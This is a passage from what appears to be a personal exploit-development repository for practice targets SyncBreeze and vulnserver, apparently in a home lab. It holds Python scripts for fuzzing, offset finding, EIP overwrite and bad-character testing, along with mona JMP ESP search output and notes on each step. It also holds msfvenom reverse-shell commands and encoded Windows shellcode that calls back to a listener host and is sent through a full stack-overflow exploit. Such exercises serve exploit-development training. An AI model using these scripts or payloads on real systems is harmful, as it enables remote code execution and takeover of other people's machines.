rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 13 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 14 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 15 | buffer+="Referer: http://192.168.0.134/login\r\n" 16 | buffer+="Connection: close\r\n" 17 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 18 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 19 | buffer+="\r\n" 20 | buffer+=fuzz 21 | 22 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 23 | expl.connect(("192.168.0.134", 80)) 24 | expl.send(buffer) 25 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Offset.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | crash = "A" * 780 + "V" * 4 7 | crash += "C" * (100-len(crash)) 8 | 9 | fuzz="username="+crash+"&password=A" 10 | 11 | buffer="POST /login HTTP/1.1\r\n" 12 | buffer+="Host: 192.1.0.134\r\n" 13 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 14 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 15 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 16 | buffer+="Referer: http://192.168.0.134/login\r\n" 17 | buffer+="Connection: close\r\n" 18 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 19 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 20 | buffer+="\r\n" 21 | buffer+=fuzz 22 | 23 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 24 | expl.connect(("192.168.0.134", 80)) 25 | expl.send(buffer) 26 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Pattern.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | 6 | crash = 
"Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk" 7 | 8 | fuzz="username="+crash+"&password=A" 9 | 10 | buffer="POST /login HTTP/1.1\r\n" 11 | buffer+="Host: 192.1.0.134\r\n" 12 | buffer+="User-Agent: Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0\r\n" 13 | buffer+="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n" 14 | buffer+="Accept-Language: en-US,en;q=0.5\r\n" 15 | buffer+="Referer: http://192.168.0.134/login\r\n" 16 | buffer+="Connection: close\r\n" 17 | buffer+="Content-Type: application/x-www-form-urlencoded\r\n" 18 | buffer+="Content-Length: "+str(len(fuzz))+"\r\n" 19 | buffer+="\r\n" 20 | buffer+=fuzz 21 | 22 | expl = socket.socket (socket.AF_INET, socket.SOCK_STREAM) 23 | expl.connect(("192.168.0.134", 80)) 24 | expl.send(buffer) 25 | expl.close() -------------------------------------------------------------------------------- /BufferOverflow/SyncBreeze-Server/Shellcode.py: 
-------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | import socket 3 | import os 4 | import sys 5 | import struct 6 | 7 | #msfvenom -p windows/shell_reverse_tcp LHOS=192.168.0.135 LPORT=1234 EXITFUNC=thread -f c -b "\x00\x0a\x0d\x25\x26\x2b\x3d" 8 | 9 | Shellcode=("\xdb\xc4\xbd\x89\x4e\xa1\xdf\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" 10 | "\x52\x31\x6b\x17\x83\xc3\x04\x03\xe2\x5d\x43\x2a\x08\x89\x01" 11 | "\xd5\xf0\x4a\x66\x5f\x15\x7b\xa6\x3b\x5e\x2c\x16\x4f\x32\xc1" 12 | "\xdd\x1d\xa6\x52\x93\x89\xc9\xd3\x1e\xec\xe4\xe4\x33\xcc\x67" 13 | "\x67\x4e\x01\x47\x56\x81\x54\x86\x9f\xfc\x95\xda\x48\x8a\x08" 14 | "\xca\xfd\xc6\x90\x61\x4d\xc6\x90\x96\x06\xe9\xb1\x09\x1c\xb0" 15 | "\x11\xa8\xf1\xc8\x1b\xb2\x16\xf4\xd2\x49\xec\x82\xe4\x9b\x3c" 16 | "\x6a\x4a\xe2\xf0\x99\x92\x23\x36\x42\xe1\x5d\x44\xff\xf2\x9a" 17 | "\x36\xdb\x77\x38\x90\xa8\x20\xe4\x20\x7c\xb6\x6f\x2e\xc9\xbc" 18 | "\x37\x33\xcc\x11\x4c\x4f\x45\x94\x82\xd9\x1d\xb3\x06\x81\xc6" 19 | "\xda\x1f\x6f\xa8\xe3\x7f\xd0\x15\x46\xf4\xfd\x42\xfb\x57\x6a" 20 | "\xa6\x36\x67\x6a\xa0\x41\x14\x58\x6f\xfa\xb2\xd0\xf8\x24\x45" 21 | "\x16\xd3\x91\xd9\xe9\xdc\xe1\xf0\x2d\x88\xb1\x6a\x87\xb1\x59" 22 | "\x6a\x28\x64\xcd\x3a\x86\xd7\xae\xea\x66\x88\x46\xe0\x68\xf7" 23 | "\x77\x0b\xa3\x90\x12\xf6\x24\x5f\x4a\xf8\x33\x37\x89\xf8\x3f" 24 | "\x1a\x04\x1e\x55\x8a\x41\x89\xc2\x33\xc8\x41\x72\xbb\xc6\x2c" 25 | "\xb4\x37\xe5\xd1\x7b\xb0\x80\xc1\xec\x30\xdf\xbb\xbb\x4f\xf5" 26 | "\xd3\x20\xdd\x92\x23\x2e\xfe\x0c\x74\x67\x30\x45\x10\x95\x6b" 27 | "\xff\x06\x64\xed\x38\x82\xb3\xce\xc7\x0b\x31\x6a\xec\x1b\x8f" 28 | "\x73\xa8\x4f\x5f\x22\x66\x39\x19\x9c\xc8\x93\xf3\x73\x83\x73" 29 | "\x85\xbf\x14\x05\x8a\x95\xe2\xe9\x3b\x40\xb3\x16\xf3\x04\x33" 30 | "\x6f\xe9\xb4\xbc\xba\xa9\xd5\x5e\x6e\xc4\x7d\xc7\xfb\x65\xe0" 31 | "\xf8\xd6\xaa\x1d\x7b\xd2\x52\xda\x63\x97\x57\xa6\x23\x44\x2a" 32 | "\xb7\xc1\x6a\x99\xb8\xc3") 33 | 34 | 35 | jmp_esp= struct.pack(" !mona find -s "\xff\xe4" -m shell32.dll 23 | 
0x7719BC93 24 | 25 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/Eip_control.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | Shellcode="A" * 2003 +"B" * 4 5 | 6 | 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print("Sending pattern to Remote server....." ) 11 | s.send(('TRUN /.:/'+ Shellcode)) 12 | s.close() 13 | 14 | except: 15 | print("Error in connecting") 16 | sys.exit() 17 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/ShellCode.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | "Ret address=>625011AF" 5 | 6 | exploit=("\xda\xc0\xbb\x46\xaa\xba\x69\xd9\x74\x24\xf4\x58\x29\xc9\xb1" 7 | "\x52\x31\x58\x17\x03\x58\x17\x83\xae\x56\x58\x9c\xd2\x4f\x1f" 8 | "\x5f\x2a\x90\x40\xe9\xcf\xa1\x40\x8d\x84\x92\x70\xc5\xc8\x1e" 9 | "\xfa\x8b\xf8\x95\x8e\x03\x0f\x1d\x24\x72\x3e\x9e\x15\x46\x21" 10 | "\x1c\x64\x9b\x81\x1d\xa7\xee\xc0\x5a\xda\x03\x90\x33\x90\xb6" 11 | "\x04\x37\xec\x0a\xaf\x0b\xe0\x0a\x4c\xdb\x03\x3a\xc3\x57\x5a" 12 | "\x9c\xe2\xb4\xd6\x95\xfc\xd9\xd3\x6c\x77\x29\xaf\x6e\x51\x63" 13 | "\x50\xdc\x9c\x4b\xa3\x1c\xd9\x6c\x5c\x6b\x13\x8f\xe1\x6c\xe0" 14 | "\xed\x3d\xf8\xf2\x56\xb5\x5a\xde\x67\x1a\x3c\x95\x64\xd7\x4a" 15 | "\xf1\x68\xe6\x9f\x8a\x95\x63\x1e\x5c\x1c\x37\x05\x78\x44\xe3" 16 | "\x24\xd9\x20\x42\x58\x39\x8b\x3b\xfc\x32\x26\x2f\x8d\x19\x2f" 17 | "\x9c\xbc\xa1\xaf\x8a\xb7\xd2\x9d\x15\x6c\x7c\xae\xde\xaa\x7b" 18 | "\xd1\xf4\x0b\x13\x2c\xf7\x6b\x3a\xeb\xa3\x3b\x54\xda\xcb\xd7" 19 | "\xa4\xe3\x19\x77\xf4\x4b\xf2\x38\xa4\x2b\xa2\xd0\xae\xa3\x9d" 20 | "\xc1\xd1\x69\xb6\x68\x28\xfa\x79\xc4\x33\x69\x11\x17\x33\x89" 21 | "\x30\x9e\xd5\xfb\xa4\xf7\x4e\x94\x5d\x52\x04\x05\xa1\x48\x61" 22 | 
"\x05\x29\x7f\x96\xc8\xda\x0a\x84\xbd\x2a\x41\xf6\x68\x34\x7f" 23 | "\x9e\xf7\xa7\xe4\x5e\x71\xd4\xb2\x09\xd6\x2a\xcb\xdf\xca\x15" 24 | "\x65\xfd\x16\xc3\x4e\x45\xcd\x30\x50\x44\x80\x0d\x76\x56\x5c" 25 | "\x8d\x32\x02\x30\xd8\xec\xfc\xf6\xb2\x5e\x56\xa1\x69\x09\x3e" 26 | "\x34\x42\x8a\x38\x39\x8f\x7c\xa4\x88\x66\x39\xdb\x25\xef\xcd" 27 | "\xa4\x5b\x8f\x32\x7f\xd8\xaf\xd0\x55\x15\x58\x4d\x3c\x94\x05" 28 | "\x6e\xeb\xdb\x33\xed\x19\xa4\xc7\xed\x68\xa1\x8c\xa9\x81\xdb" 29 | "\x9d\x5f\xa5\x48\x9d\x75") 30 | 31 | 32 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" + "\x90" *32 +exploit 33 | 34 | try: 35 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 36 | s.connect(('192.168.1.133',9999)) 37 | print("Sending pattern to Remote server....." ) 38 | s.send(('TRUN /.:/'+ Shellcode)) 39 | s.close() 40 | 41 | except: 42 | print("Error in connecting") 43 | sys.exit() 44 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/bad_char: -------------------------------------------------------------------------------- 1 | badchars = ("\x00\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 2 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 3 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 4 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 5 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 6 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 7 | 
"\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 8 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 9 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/bad_char.py: -------------------------------------------------------------------------------- 1 | #!/bin/python 2 | import sys, socket 3 | 4 | badchars = ("\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f" 5 | "\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40" 6 | "\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f" 7 | "\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f" 8 | "\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f" 9 | "\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf" 10 | "\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf" 11 | "\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff") 12 | 13 | Shellcode="A" * 2003 +"B" * 4 + badchars 14 | 15 | 16 | try: 17 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 18 | s.connect(('192.168.1.133',9999)) 19 | print("Sending pattern to Remote server....." 
) 20 | s.send(('TRUN /.:/'+ Shellcode)) 21 | s.close() 22 | 23 | except: 24 | print("Error in connecting") 25 | sys.exit() 26 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/exploit_code: -------------------------------------------------------------------------------- 1 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" 2 | [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload 3 | [-] No arch selected, selecting arch: x86 from the payload 4 | Found 11 compatible encoders 5 | Attempting to encode payload with 1 iterations of x86/shikata_ga_nai 6 | x86/shikata_ga_nai succeeded with size 351 (iteration=0) 7 | x86/shikata_ga_nai chosen with final size 351 8 | Payload size: 351 bytes 9 | Final size of c file: 1500 bytes 10 | unsigned char buf[] = 11 | "\xdb\xd1\xbb\xb1\x96\x2f\x26\xd9\x74\x24\xf4\x5a\x29\xc9\xb1" 12 | "\x52\x83\xc2\x04\x31\x5a\x13\x03\xeb\x85\xcd\xd3\xf7\x42\x93" 13 | "\x1c\x07\x93\xf4\x95\xe2\xa2\x34\xc1\x67\x94\x84\x81\x25\x19" 14 | "\x6e\xc7\xdd\xaa\x02\xc0\xd2\x1b\xa8\x36\xdd\x9c\x81\x0b\x7c" 15 | "\x1f\xd8\x5f\x5e\x1e\x13\x92\x9f\x67\x4e\x5f\xcd\x30\x04\xf2" 16 | "\xe1\x35\x50\xcf\x8a\x06\x74\x57\x6f\xde\x77\x76\x3e\x54\x2e" 17 | "\x58\xc1\xb9\x5a\xd1\xd9\xde\x67\xab\x52\x14\x13\x2a\xb2\x64" 18 | "\xdc\x81\xfb\x48\x2f\xdb\x3c\x6e\xd0\xae\x34\x8c\x6d\xa9\x83" 19 | "\xee\xa9\x3c\x17\x48\x39\xe6\xf3\x68\xee\x71\x70\x66\x5b\xf5" 20 | "\xde\x6b\x5a\xda\x55\x97\xd7\xdd\xb9\x11\xa3\xf9\x1d\x79\x77" 21 | "\x63\x04\x27\xd6\x9c\x56\x88\x87\x38\x1d\x25\xd3\x30\x7c\x22" 22 | "\x10\x79\x7e\xb2\x3e\x0a\x0d\x80\xe1\xa0\x99\xa8\x6a\x6f\x5e" 23 | "\xce\x40\xd7\xf0\x31\x6b\x28\xd9\xf5\x3f\x78\x71\xdf\x3f\x13" 24 | "\x81\xe0\x95\xb4\xd1\x4e\x46\x75\x81\x2e\x36\x1d\xcb\xa0\x69" 25 | "\x3d\xf4\x6a\x02\xd4\x0f\xfd\xed\x81\x0e\x6e\x85\xd3\x10\x94" 26 | "\x84\x5d\xf6\xfe\x38\x08\xa1\x96\xa1\x11\x39\x06\x2d\x8c\x44" 27 | 
"\x08\xa5\x23\xb9\xc7\x4e\x49\xa9\xb0\xbe\x04\x93\x17\xc0\xb2" 28 | "\xbb\xf4\x53\x59\x3b\x72\x48\xf6\x6c\xd3\xbe\x0f\xf8\xc9\x99" 29 | "\xb9\x1e\x10\x7f\x81\x9a\xcf\xbc\x0c\x23\x9d\xf9\x2a\x33\x5b" 30 | "\x01\x77\x67\x33\x54\x21\xd1\xf5\x0e\x83\x8b\xaf\xfd\x4d\x5b" 31 | "\x29\xce\x4d\x1d\x36\x1b\x38\xc1\x87\xf2\x7d\xfe\x28\x93\x89" 32 | "\x87\x54\x03\x75\x52\xdd\x23\x94\x76\x28\xcc\x01\x13\x91\x91" 33 | "\xb1\xce\xd6\xaf\x31\xfa\xa6\x4b\x29\x8f\xa3\x10\xed\x7c\xde" 34 | "\x09\x98\x82\x4d\x29\x89"; 35 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/fuzz.py: -------------------------------------------------------------------------------- 1 | import sys, socket 2 | from time import sleep 3 | 4 | buffer ="A" * 100 5 | 6 | while True: 7 | try: 8 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 9 | s.connect(('192.168.1.133',9999)) 10 | print "Trying with buffer length %d" % len(buffer) 11 | s.send(('LTER /.:/'+ buffer)) 12 | s.close() 13 | sleep(1) 14 | buffer=buffer + "A"*100 15 | 16 | 17 | except: 18 | print("Fuzzing Crashed at %s by" % str(len(buffer))) 19 | sys.exit() -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/index: -------------------------------------------------------------------------------- 1 | Vuln Server part 2 LTER 2 | 3 | 4 | A. Spiking =>generic_send_tcp 192.168.1.133 9999 spike.spk 0 0 5 | 6 | 7 | B. Fuzzing => buyffer crash at 2100 8 | 9 | 10 | C. Findinf offset=> 11 | /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2100 12 | 13 | EIP Pointer-=> 386F4337 14 | 15 | D. Finding exject buffer buffer sdpace via offset 16 | 17 | /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 2100 -q 386F4337 18 | 19 | Exject Match=> 2003 20 | 21 | 22 | E. 
Controlling EIP { Shellcode="A" * 2003 +"B" * 4 } 23 | 24 | F Finding bad character Shellcode="A" * 2003 +"B" * 4 + bad_char 25 | 26 | "\x00" + 27 | 28 | G: modules to find the exact ESP address DLL 29 | { 30 | !mona modules => 31 | 32 | Address=0BADF00D [essfunc.dll] (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 33 | 34 | Address=0BADF00D [vulnserver.exe] (C:\Users\vinod\Desktop\Vul UFF\vulnserver.exe) 35 | 36 | } 37 | 38 | H Finding JMP ESP modules for "FFE4" 39 | 40 | !mona find -s "\xff\xe4" -m essfunc.dll 41 | return address=> 42 | Address=625011AF 43 | Address=625011BB 44 | Address=625011C7 45 | Address=625011D3 46 | Address=625011DF 47 | Address=625011EB 48 | Address=625011F7 49 | Address=62501203 50 | Address=62501205 51 | 52 | I G: Check for EIP control and break point 53 | Shellcode="A" * 2003 + "\xaf\x11\x50\x62" 54 | 55 | H: shell code 56 | msfvenom -p windows/shell_reverse_tcp LHOS=192.168.1.147 LPORT=1234 EXITFUNC=thread -f c -b "\x00" -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/offset.py: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | import sys, socket 3 | 4 | 5 | 
offset="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3
Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9" 6 | 7 | 8 | try: 9 | s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) 10 | s.connect(('192.168.1.133',9999)) 11 | print("Sending pattern to Remote server" ) 12 | s.send(('TRUN /.:/'+ offset)) 13 | s.close() 14 | 15 | except: 16 | print("Error in connecting") 17 | sys.exit() 18 | -------------------------------------------------------------------------------- /BufferOverflow/Vuln Part2/ret_add: -------------------------------------------------------------------------------- 1 | Log data, item 11 2 | Address=625011AF 3 | Message= 0x625011af : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 4 | 5 | 6 | Log data, item 10 7 | Address=625011BB 8 | Message= 0x625011bb : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 9 | 10 | Log data, item 9 11 | Address=625011C7 12 | Message= 0x625011c7 : "\xff\xe4" | {PAGE_EXECUTE_READ} [essfunc.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v-1.0- (C:\Users\vinod\Desktop\Vul UFF\essfunc.dll) 13 | 14 | Log 